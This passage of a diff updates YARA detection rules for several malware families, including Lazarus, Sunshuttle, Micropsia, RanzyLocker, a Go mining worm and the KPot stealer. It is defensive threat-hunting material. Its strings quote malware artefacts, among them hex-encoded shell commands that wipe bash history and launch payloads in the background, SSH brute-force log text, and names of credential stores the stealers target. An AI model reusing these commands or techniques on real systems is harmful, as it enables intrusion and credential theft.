+		hash1 = "274beb57ae19cbc5c2027e08cb2b718dea7ed1acb21bd329d5aba33231fb699d"
+		hash2 = "3a4ef9b7bd7f61c75501262e8b9e31f9e9bc3a841d5de33dcdeb8aaa65e95f76"
 
 	strings:
-		$seq1 = { 45 8c 00 8d 4d 8c c6 45 8d 7e c6 45 8e 4c c6 45 8f 0e c6 45 90 2c c6 45 91 4d c6 45 92 57 c6 45 93 13 c6 45 94 5d c6 45 95 08 c6 45 96 4c c6 45 97 77 c6 45 98 77 89 85 54 ff ff ff c6 45 99 6e 8a 45 8d e8 9f 0b 00 00 6a 6b 68 a8 21 3d be ba 0f 00 00 00 8b f0 e8 3c 3e 00 00 83 c4 08 56 ff d0 c6 45 f4 00 c6 45 f5 5a c6 45 f6 49 c6 45 f7 4c c6 45 f8 0b c6 45 f9 0b c6 45 fa 66 c6 45 fb 4c c6 45 fc 0b c6 45 fd 0b c6 45 fe 3f 89 85 50 ff ff ff 8a 45 f5 80 7d f4 00 75 2b 33 c9 66 0f 1f 84 00 00 00 00 00 8a 44 0d f5 0f b6 c0 83 e8 3f 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 54 0d f5 41 83 f9 0a 72 e0 6a 6b 68 a8 21 3d be ba 0f 00 00 00 e8 bf 3d 00 00 83 c4 08 8d 4d f5 51 ff d0 c6 85 7c ff ff ff 00 8d 8d 7c ff ff ff c6 85 7d ff ff ff 48 c6 85 7e ff ff ff 17 c6 85 7f ff ff ff 3c c6 45 80 71 c6 45 81 3c c6 45 82 37 c6 45 83 57 c6 45 84 71 c6 45 85 0a c6 45 86 67 c6 45 87 12 c6 45 88 12 89 85 3c }
-		$seq2 = { 6c ff ff ff 00 8d 8d 6c ff ff ff c6 85 6d ff ff ff 02 c6 85 6e ff ff ff 17 c6 85 6f ff ff ff 72 c6 85 70 ff ff ff 3a c6 85 71 ff ff ff 16 c6 85 72 ff ff ff 73 c6 85 73 ff ff ff 10 c6 85 74 ff ff ff 78 c6 85 75 ff ff ff 1c c6 85 76 ff ff ff 00 c6 85 77 ff ff ff 39 c6 85 78 ff ff ff 39 89 85 48 ff ff ff c6 85 79 ff ff ff 71 8a 85 6d ff ff ff e8 1d 08 00 00 6a 6b 68 a8 21 3d }
-		$seq3 = { 8b d9 89 9d b8 fd ff ff c7 85 d4 fd ff ff 0b 01 00 00 c7 85 d8 fd ff ff 0b 02 00 00 c6 85 c4 fd ff ff 00 c6 85 c5 fd ff ff 19 c6 85 c6 fd ff ff 0d c6 85 c7 fd ff ff 27 c6 85 c8 fd ff ff 1f c6 85 c9 fd ff ff 0d c6 85 ca fd ff ff 1b c6 85 cb fd ff ff 28 c6 85 cc fd ff ff 26 c6 85 cd fd ff ff 1e c6 85 ce fd ff ff 0b c6 85 cf fd ff ff 1b c6 85 d0 fd ff ff 1b 8d 8d c4 fd ff ff c6 85 d1 fd }
-		$seq4 = { c6 85 00 ff ff ff 00 c6 85 01 ff ff ff 4b c6 85 02 ff ff ff 1f c6 85 03 ff ff ff 35 c6 85 04 ff ff ff 1f c6 85 05 ff ff ff 23 c6 85 06 ff ff ff 1f c6 85 07 ff ff ff 68 c6 85 08 ff ff ff 1f c6 85 09 ff ff ff 38 c6 85 0a ff ff ff 1f c6 85 0b ff ff ff 10 c6 85 0c ff ff ff 1f c6 85 0d ff ff ff 66 c6 85 0e ff ff ff 1f c6 85 0f ff ff ff 2a c6 85 10 ff ff ff 1f c6 85 11 ff ff ff 43 c6 85 12 ff ff ff 1f c6 85 13 ff ff ff 23 c6 85 14 ff ff ff 1f c6 85 15 ff ff ff 10 c6 85 16 ff ff ff 1f c6 85 17 ff ff ff 07 c6 85 18 ff ff ff 1f c6 85 19 ff ff ff 51 c6 85 1a ff ff ff 1f c6 85 1b ff ff ff 1c c6 85 1c ff ff ff 1f c6 85 1d ff ff ff 43 c6 85 1e ff ff ff 1f c6 85 1f ff ff ff 10 c6 85 20 ff ff ff 1f c6 85 21 ff ff ff 61 c6 85 22 ff ff ff 1f c6 85 23 ff ff ff 74 c6 85 24 ff ff ff 1f c6 85 25 ff ff ff 41 c6 85 26 ff ff ff 1f c6 85 27 ff ff ff 10 c6 85 28 ff ff ff 1f c6 85 29 ff ff ff 59 c6 85 2a ff ff ff 1f c6 85 2b ff ff ff 43 c6 85 2c ff ff ff 1f c6 85 2d ff ff ff 38 c6 85 2e ff ff ff 1f c6 85 2f ff ff ff 2b c6 85 30 }
+		$seq1 = { 55 8b ec 83 e4 f8 81 ec 08 04 00 00 a1 34 45 49 00 33 c4 89 84 24 04 04 00 00 83 ec 08 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 af 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 98 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 81 9f ff ff 83 c4 0c 8d 04 24 68 00 04 00 00 6a 00 50 e8 [2] 01 00 83 c4 0c 8d 04 24 [4] 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? ab 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 6c 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a9 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 33 c0 66 89 84 24 fe 03 00 00 8d 04 24 68 [2] 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a6 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 8d 4c 24 0c e8 6b a1 ff ff 83 c4 04 ba [2] 48 00 b9 ?? 83 48 00 68 [2] 48 00 e8 94 9e ff ff 8b 8c 24 10 04 00 00 83 c4 0c 33 cc e8 [2] 01 00 8b e5 5d }
+		$seq2 = { 55 8b ec 6a ff 68 [2] 47 00 64 a1 00 00 00 00 50 81 ec d8 00 00 00 a1 34 45 49 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 08 8b 75 14 c7 45 fc 00 00 00 00 89 85 34 ff ff ff 89 85 40 ff ff ff 33 c0 50 50 50 50 c7 85 3c ff ff ff 00 00 00 00 68 ?? 70 48 00 89 b5 6c ff ff ff c7 85 48 ff ff ff 00 00 00 00 c7 85 44 ff ff ff 00 00 00 00 89 85 50 ff ff ff ff 15 78 55 47 00 89 85 38 ff ff ff 85 c0 74 3f 6a 00 68 bb 01 00 00 68 ?? 6d 48 00 50 ff 15 8c 55 47 00 89 85 44 ff ff ff 85 c0 74 22 68 00 00 80 00 6a 00 6a 00 6a 00 68 ?? 71 48 00 68 ?? 6d 48 00 50 ff 15 90 55 47 00 89 85 50 ff ff ff 8b 3d 44 53 47 00 6a 00 6a 00 6a 00 6a 00 6a ff 56 6a 00 68 e9 fd 00 00 ff d7 8b f0 56 e8 ?? 35 01 00 83 c4 04 89 85 4c ff ff ff 6a 00 6a 00 56 50 6a ff ff b5 6c ff ff ff 6a 00 68 e9 fd 00 00 ff d7 68 80 00 00 00 8b f8 8d 85 70 ff ff ff 6a 00 50 e8 [2] 02 00 57 8d 85 70 ff ff ff 68 ?? 79 48 00 50 e8 ?? a3 00 00 83 c4 18 c7 85 64 ff ff ff 00 00 00 00 33 c0 c7 85 68 ff ff ff 07 00 00 00 8d 8d 54 ff ff ff 66 89 85 54 ff ff ff 6a 10 68 [2] 48 00 e8 ?? 84 00 00 8d 8d 70 ff ff ff c7 45 fc 01 00 00 00 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 85 70 ff ff ff d1 f9 51 50 8d 8d 54 ff ff ff e8 89 63 00 00 6a 33 68 ?? 71 48 00 8d 8d 54 ff ff ff e8 77 63 00 00 8b b5 50 ff ff ff 85 f6 }
+		$s1 = "taskkill /im svehost.exe /t /f" fullword ascii
+		$s2 = "\\AppData\\Windows\\svehost.exe" fullword ascii
+		$s3 = "svehost.exe" fullword wide
+		$s4 = "bdagent.exe" fullword wide
+		$s5 = "taskkill /im keepass.exe /t /f" fullword ascii
+		$s6 = "%s\\AppData\\Windows\\svehost" fullword ascii
+		$s7 = "\\AppData\\Roaming\\ViberPc" fullword wide
+		$s8 = "\\AppData\\Roaming\\Skype" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $seq* ) and 4 of ( $s* )
 }
-
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Implant_June_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_UNC2452_Sunshuttle_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect Lazarus implant June 2020"
+		description = "Detect Sunshuttle implant used by UNC2452 group"
 		author = "Arkbird_SOLG"
-		id = "602c33f2-1e34-5267-9154-ada2d6edc64b"
-		date = "2020-06-28"
-		modified = "2020-06-28"
-		reference = "https://twitter.com/ccxsaber/status/1277064824434745345"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT_NK_Lazarus_Implant_June_2020_1.yar#L3-L23"
+		id = "faa07d19-4c61-554d-a6b1-ab7cb0919ec0"
+		date = "2021-03-06"
+		modified = "2021-03-06"
+		reference = "https://twitter.com/Arkbird_SOLG/status/1367570764468224010"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/UNC2452/APT_UNC2452_sunshuttle_Mar_2021_1.yar#L1-L31"
 		license_url = "N/A"
-		logic_hash = "29b6b8d3bdd47707854ed0dc00808d6352934950a8e7244450df78422ff3cb15"
+		logic_hash = "368487f1716aaa5c10e19a428649d6706b3f45c53853e6729752dc41fc97bc38"
 		score = 75
-		quality = 73
+		quality = 63
 		tags = "FILE"
-		hash1 = "21afaceee5fab15948a5a724222c948ad17cad181bf514a680267abcce186831"
+		hash1 = "611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c"
+		hash2 = "b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8"
+		hash3 = "bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c"
 
 	strings:
-		$s1 = "Upgrade.exe" fullword ascii
-		$s2 = "ver=%d&timestamp=%lu" fullword ascii
-		$s3 = "_update.php" fullword ascii
-		$s4 = "Dorusio Wallet 2.1.0 (Check Update Windows)" fullword wide
-		$s5 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
-		$s6 = "CONOUT$" fullword ascii
-		$s7 = "D$8fD;i" fullword ascii
-		$s8 = "WinHttpOpenRequest" fullword ascii
-		$s9 = "HTTP/1.0" fullword ascii
-		$s10 = "POST" fullword ascii
+		$s1 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 39 59 72 42 6a 6b 6b 58 46 79 6b 62 47 51 72 6d 56 32 4b 49 2f 41 48 44 69 7a 57 51 61 4d 38 47 38 4a 37 6b 56 4b 32 56 65 2f 46 55 74 5f 6b 6b 53 56 6c 78 32 36 49 6e 46 56 61 79 70 77 2f 6c 75 5a 41 54 35 55 6e 55 69 34 64 4a 65 6b 6e 73 6b 55 6e 22 }
+		$s2 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 71 6f 66 49 6b 76 62 6c 73 31 69 72 4f 36 78 68 6a 41 63 5a 2f 6a 49 69 71 41 70 70 31 56 6f 39 72 4f 53 2d 44 6a 65 4e 75 2f 62 50 75 6e 33 4e 35 74 49 42 58 4b 50 74 4e 79 73 48 4f 51 2f 41 52 53 72 63 65 6b 35 68 51 47 38 59 49 56 6e 4d 75 37 54 22 }
+		$s3 = { 6f 73 2f 65 78 65 63 2e 28 2a 43 6d 64 29 2e 52 75 6e }
+		$s4 = "main.request_session_key" fullword ascii
+		$s5 = "main.wget_file" fullword ascii
+		$s6 = "main.GetMD5Hash" fullword ascii
+		$s7 = "main.beaconing" fullword ascii
+		$s8 = "main.resolve_command" fullword ascii
+		$s9 = "main.send_file_part" fullword ascii
+		$s10 = "main.retrieve_session_key" fullword ascii
+		$s11 = "main.send_command_result" fullword ascii
+		$s12 = { 63 38 3a 32 37 3a 63 63 3a 63 32 3a 33 37 3a 35 61 }
+		$s13 = { 2d 2d 2d 2d 2d 42 45 47 49 4e }
+		$s14 = { 2d 2d 2d 2d 2d 45 4e 44 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "565005404f00b7def4499142ade5e3dd" or 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize > 800KB and 12 of them
 }
-
-rule ARKBIRD_SOLG_APT28_Zekapab_June_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect Delphi variant of Zekapab"
+		description = "Detect Micropsia used by APT-C-23 (Build 2018)"
 		author = "Arkbird_SOLG"
-		id = "cf87e67f-2db9-537d-8800-8cd47b47c276"
-		date = "2020-06-28"
-		modified = "2020-06-28"
-		reference = "https://twitter.com/DrunkBinary/status/1276573779037163520"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT28_Zekapab_June_2020_1.yar#L3-L29"
+		id = "517a33bb-0214-588f-80e4-dc82f2552330"
+		date = "2021-03-31"
+		modified = "2021-03-31"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "a02a78b8f60cf9d4441cc18b70fd00ec89253a5feafdc0eb392486b575bc61e2"
-		score = 75
-		quality = 25
+		logic_hash = "69baab88d80ab15e08f3b08dfca45a1fee6c2e6077152906f391618713fac2ef"
+		score = 50
+		quality = 69
 		tags = "FILE"
-		hash1 = "12879b9d8ae046ca2f2ebcc7b1948afc44e6e654b7f4746e7a5243267cfd7c46"
+		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
+		level = "experimental"
 
 	strings:
-		$s1 = "54484520494E535452554354494F4E2041542030783763663538326164205245464552454E434544204D454D4F525920415420307830303030303030302E2054" ascii
-		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
-		$s3 = "5C4164646974696F6E735C73616D636C69656E742E657865" ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
-		$s5 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" fullword ascii
-		$s6 = "Software\\Borland\\Delphi\\Locales" fullword ascii
-		$s7 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii
-		$s8 = "Software\\Borland\\Locales" fullword ascii
-		$s9 = "FastMM Borland Edition" fullword ascii
-		$s10 = "#7@Qhq\\1@NWgyxeH\\_bpdgc" fullword ascii
-		$s11 = "4150504C49434154494F4E204552524F52" ascii
-		$s12 = "436D442E457865202F6320" ascii
-		$s13 = "6572726F72" ascii
-		$s14 = "WndProcPtr" fullword ascii
-		$s15 = "Request.UserAgent" fullword ascii
-		$s16 = "ProxyPassword<" fullword ascii
+		$code1 = { c7 85 6c fc ff ff 12 00 00 00 8b f4 8d 85 6c fc ff ff 50 8d 8d 78 fc ff ff 51 ff 15 44 b0 66 00 3b f4 e8 80 d6 fa ff 8d 85 78 fc ff ff 50 b9 e0 83 66 00 e8 06 0d fb ff 6a 00 e8 24 0a 00 00 83 c4 04 50 e8 a2 d9 fa ff 83 c4 04 c7 85 60 fc ff ff }
+		$code2 = { 68 34 4f 61 00 8d 85 cc fd ff ff 50 e8 3d 02 fd ff 83 c4 08 8b f4 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff 15 60 b3 66 00 3b f4 e8 f2 0d fd ff 89 85 c0 fd ff ff 83 bd c0 fd ff ff 00 0f 84 49 03 00 00 8b f4 6a 00 6a 00 6a 03 6a 00 6a 00 0f b7 05 d4 83 66 00 50 8b 4d 10 51 8b 95 c0 fd ff ff 52 ff 15 58 b3 66 00 3b f4 e8 b3 0d fd ff 89 85 b4 fd ff ff 83 bd b4 fd ff ff 00 0f 84 f4 02 00 00 8b f4 6a 00 a1 d8 83 66 00 50 6a 00 6a 00 68 5c 4f 61 00 8b 4d 14 51 8d 95 cc fd ff ff 52 8b 85 b4 fd ff ff 50 ff 15 70 b3 66 00 3b f4 e8 6e 0d fd ff 89 85 a8 fd ff ff 83 bd a8 fd ff ff 00 0f 84 af 02 00 00 c7 85 9c fd ff ff 00 00 00 00 83 }
+		$code3 = { 8b 85 60 fc ff ff 83 c0 01 89 85 60 fc ff ff 83 bd 60 fc ff ff 0a 7d 2a e8 3f fc fa ff 99 b9 1a 00 00 00 f7 f9 83 c2 41 88 95 57 fc ff ff 0f b6 85 57 fc ff ff 50 b9 e0 83 66 00 e8 8b 14 fb }
+		$s1 = "szhttpUserAgent" fullword ascii
+		$s2 = "httpUseragent" fullword ascii
+		$s3 = "dwByteRead" fullword ascii
+		$s4 = { 25 59 25 6d 25 64 2d 25 49 2d 25 4d 2d 25 53 }
+		$s5 = { 53 45 4c 45 43 54 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 76 61 63 75 75 6d 5f 64 62 2e 27 20 7c 7c 20 73 75 62 73 74 72 28 73 71 6c 2c 31 34 29 20 20 46 52 4f 4d 20 73 71 6c 69 74 65 5f 6d 61 73 74 65 72 20 57 48 45 52 45 20 73 71 6c 20 4c 49 4b 45 20 27 43 52 45 41 54 45 20 49 4e 44 45 58 20 25 27 }
+		$s6 = { 55 50 44 41 54 45 20 25 51 2e 25 73 20 53 45 54 20 73 71 6c 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 20 3d 20 27 74 72 69 67 67 65 72 27 20 54 48 45 4e 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 28 73 71 6c 2c 20 25 51 29 45 4c 53 45 20 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 61 62 6c 65 28 73 71 6c 2c 20 25 51 29 20 45 4e 44 2c 20 74 62 6c 5f 6e 61 6d 65 20 3d 20 25 51 2c 20 6e 61 6d 65 20 3d 20 43 41 53 45 20 57 48 45 4e 20 74 79 70 65 3d 27 74 61 62 6c 65 27 20 54 48 45 4e 20 25 51 20 57 48 45 4e 20 6e 61 6d 65 20 4c 49 4b 45 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 25 25 27 20 41 4e 44 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 54 48 45 4e 20 27 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 27 20 7c 7c 20 25 51 20 7c 7c 20 73 75 62 73 74 72 28 6e 61 6d 65 2c 25 64 2b 31 38 29 20 45 4c 53 45 20 6e 61 6d 65 20 45 4e 44 20 57 48 45 52 45 20 74 62 6c 5f 6e 61 6d 65 3d 25 51 20 43 4f 4c 4c 41 54 45 20 6e 6f 63 61 73 65 20 41 4e 44 20 28 74 79 70 65 3d 27 74 61 62 6c 65 27 20 4f 52 20 74 79 70 65 3d 27 69 6e 64 65 78 27 20 4f 52 20 74 79 70 65 3d 27 74 72 69 67 67 65 72 27 29 3b }
+		$s7 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 }
+		$s8 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "dbdfe8b60c1de0a9201044b3e91b9502" or 12 of them )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_ELF_Go_Worm_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_2 : FILE
 {
 	meta:
-		description = "Detect the worm written in Go that drops XMRig Miner"
+		description = "Detect Micropsia used by APT-C-23 (Build 2020)"
 		author = "Arkbird_SOLG"
-		id = "6f4a9d3a-e038-5d7f-9c18-c380a0b295d2"
-		date = "2021-07-06"
-		modified = "2021-07-06"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-06/MAL_ELF_Go_Worm_Jul_2021_1.yara#L1-L22"
+		id = "cdd95b35-09b4-5412-bd86-55c2e7523d3e"
+		date = "2021-03-31"
+		modified = "2021-03-31"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_2.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "be8b95f8aab62d3a2b3376a0481ebc609afcd089e0613d39f258e07366b708a1"
-		score = 75
-		quality = 61
+		logic_hash = "a00091161ec69c9885e983117e2b424f860bfbab2551ea23b74c37fc062850b9"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "774ccd1281b02bc9f0c7e7185c424a42cd98bcc758c893e8a96dfb206a02fcbe"
-		hash2 = "bea5a4358184555924ab6c831bf34edf279f4b93d750d5321263439dcf9c245a"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "d9b938d89a13620aabe81e0a9d02778cad8658cbfd6f15e7dab47b1118b53237"
+		hash2 = "42f40fb2e4f971807fcb771c9aacc5a2361fdcdaf3eaafc31b22096d81dd0666"
+		level = "experimental"
 
 	strings:
-		$s1 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 43 68 65 63 6b 20 49 50 28 25 73 29 20 77 69 74 68 20 53 53 48 20 70 6f 72 74 20 69 73 20 6f 70 65 6e 2e 2e 2e }
-		$s2 = { 63 61 74 20 2f 64 65 76 2f 6e 75 6c 6c 20 3e 20 7e 2f 2e 62 61 73 68 5f 68 69 73 74 6f 72 79 20 26 26 20 68 69 73 74 6f 72 79 20 2d 63 }
-		$s3 = { 6e 6f 68 75 70 20 2e 2f 25 73 20 26 3e 20 6d 79 73 71 6c 6c 6f 67 73 20 26 }
-		$s4 = { 72 6d 20 2d 66 20 25 73 20 6d 79 73 71 6c 6c 6f 67 73 }
-		$s5 = { 63 6f 6d 6d 61 6e 64 20 2d 76 20 62 61 73 68 }
-		$s6 = { 53 74 6f 70 20 62 72 75 74 65 20 6f 6e 2c 20 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 3a 20 44 55 52 41 54 49 4f 4e 3a 20 25 66 }
-		$s7 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 }
+		$code1 = { 8d 45 f8 8b 15 90 c7 69 00 e8 1e 05 d5 ff c7 45 d0 00 00 00 00 c7 45 d4 00 00 00 00 8b 45 d8 8b 58 5c 85 db 74 22 8b c3 8b 10 ff 12 52 50 8b 45 d8 8b 40 5c e8 af 4b db ff 29 04 24 19 54 24 04 58 5a 89 45 d0 89 55 d4 6a 04 8d 45 d8 50 6a 2d 8b 45 d8 8b 80 a4 00 00 00 50 e8 59 cd ff ff c7 45 c4 02 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 3b cd ff ff c7 45 c4 01 00 00 00 6a 04 8d 45 c4 50 6a 3f 8b 45 d8 8b 80 a4 00 00 00 50 e8 1d cd ff ff 33 c0 5a 59 59 64 89 10 68 aa df 6b 00 8b 45 e8 e8 a0 }
+		$code2 = { 6a 00 8b 45 d0 50 6a 00 6a 00 6a 00 6a 00 8b 45 d8 8b 80 a4 00 00 00 50 e8 d1 cc ff ff 85 c0 75 19 8b 15 50 a7 6e 00 8b 4d e8 8b 45 ec e8 9c fc }
+		$code3 = { 8d 4d f4 8b 45 d4 8b 40 0c ba 01 00 00 00 8b 18 ff 53 0c 8b 45 d4 8b 50 10 a1 bc 1c 6f 00 e8 82 bc ff ff 8b 55 f4 a1 bc 1c 6f 00 e8 75 bc ff ff 8b 45 f4 ba f4 7c 6d 00 e8 a0 4c d3 ff 0f 85 cf 00 00 00 ba 08 7d 6d 00 a1 bc 1c 6f 00 e8 53 bc ff ff 33 c0 55 68 9a 76 6d 00 64 ff 30 64 89 20 33 c0 89 45 dc 8d 55 9c b8 38 7c 6d 00 e8 7b 86 d5 ff ff 75 9c 68 50 7c 6d 00 8d 55 98 b8 09 00 00 00 e8 c6 c4 ff ff ff 75 98 68 60 7c 6d 00 8d 45 dc ba 04 00 00 00 e8 91 4b d3 ff e8 c4 22 d5 ff dd 5d c0 9b ff 75 c4 ff 75 c0 8d 4d e0 8b 15 30 ab 6e 00 b8 70 7c 6d 00 e8 97 32 d5 ff 8b 45 d4 83 c0 14 }
+		$s1 = { 4a 00 50 00 45 00 47 00 20 00 49 00 6d 00 61 00 67 00 65 00 20 00 46 00 69 00 6c 00 65 00 25 00 53 00 63 00 68 00 65 00 6d 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 25 00 73 }
+		$s2 = "Download start ." fullword wide
+		$s3 = "application/x-msdownload" fullword wide
+		$s4 = "Start Download File" fullword wide
+		$s5 = "getHttpDownload" fullword ascii
+		$s6 = "Download start ." fullword wide
+		$s7 = "-start" fullword wide
+		$s8 = "-Winapi.ImageHlp" fullword ascii
+		$s9 = "postHttpDownload" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 900KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 2 of ( $code* ) and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Kpot_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Ranzylocker_Hunting_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect KPot stealer (new variant October 2020)"
+		description = "Detect RanzyLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "316feeb3-59e5-5d18-9800-db41fabd6cb0"
-		date = "2020-10-17"
-		modified = "2020-10-17"
+		id = "0d0c743b-9beb-5413-b5ba-dad75c2ee0b7"
+		date = "2021-03-16"
+		modified = "2021-03-17"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-17/MAL_KPot_Oct_2020_1.yar#L1-L40"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-16/RanzyLocker/Ran_RanzyLocker_Hunting_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "20010e8f2d45f904911664edee710f4dca18327c2b80766c253970a50624d13c"
-		score = 75
-		quality = 73
+		logic_hash = "ec7867e40e4418bb662c8cf5a71566cd261d2040ee5d3afa0bbe2b92ebfef98e"
+		score = 50
+		quality = 53
 		tags = "FILE"
-		hash1 = "028ec268176707aadc2cf8e65a28236cbed214f9fd65fc3346ee34e859e50057"
+		hash1 = "5d0af3bf0dc7d99fc87d844a0fcd99796b9257ba02d78510422c498d445f0d0d"
 
 	strings:
-		$olds1 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" fullword ascii
-		$olds2 = "%s\\%s\\%s\\%.6s_%d.dat" fullword wide
-		$olds3 = "%s\\%s\\%s-Qt" fullword wide
-		$olds4 = "%s\\%s\\%.6ss" fullword wide
-		$olds5 = "%s\\%s\\%s.vdf" fullword wide
-		$olds6 = "https://%S/a/%S" fullword wide
-		$olds7 = { 4e 00 61 00 6d 00 65 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 43 00 6f 00 6d 00 6d 00 65 00 6e 00 74 00 3a 00 20 00 25 00 6c 00 73 00 0d 00 0a 00 55 00 73 00 65 00 72 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 44 00 61 00 74 00 61 00 3a 00 20 00 0d 00 0a 00 00 00 00 00 25 00 32 00 2e 00 32 00 58 00 20 00 00 00 00 00 25 00 2d 00 35 00 30 00 73 00 20 00 25 00 73 }
-		$debug1 = "4|Remote Desktop|%s|%s|%s|" fullword ascii
-		$debug2 = "1|TotalCommander|%s|%s|%s|" fullword ascii
-		$debug3 = "1|FileZilla|%s:%s|%s|%S|" fullword ascii
-		$debug4 = "5|Windows Mail|%s|%s|%s|" fullword ascii
-		$debug5 = "5|Outlook|%s:%d|%s|%s|" fullword ascii
-		$debug6 = "1|WS_FTP|%s|%s|%S|" fullword ascii
-		$debug7 = "1|WinSCP|%s|%s|%s|" fullword ascii
-		$debug8 = "3|Pidgin|%s|%s|%s|" fullword ascii
-		$debug9 = "3|Psi(+)|%s|%s|%s|" fullword ascii
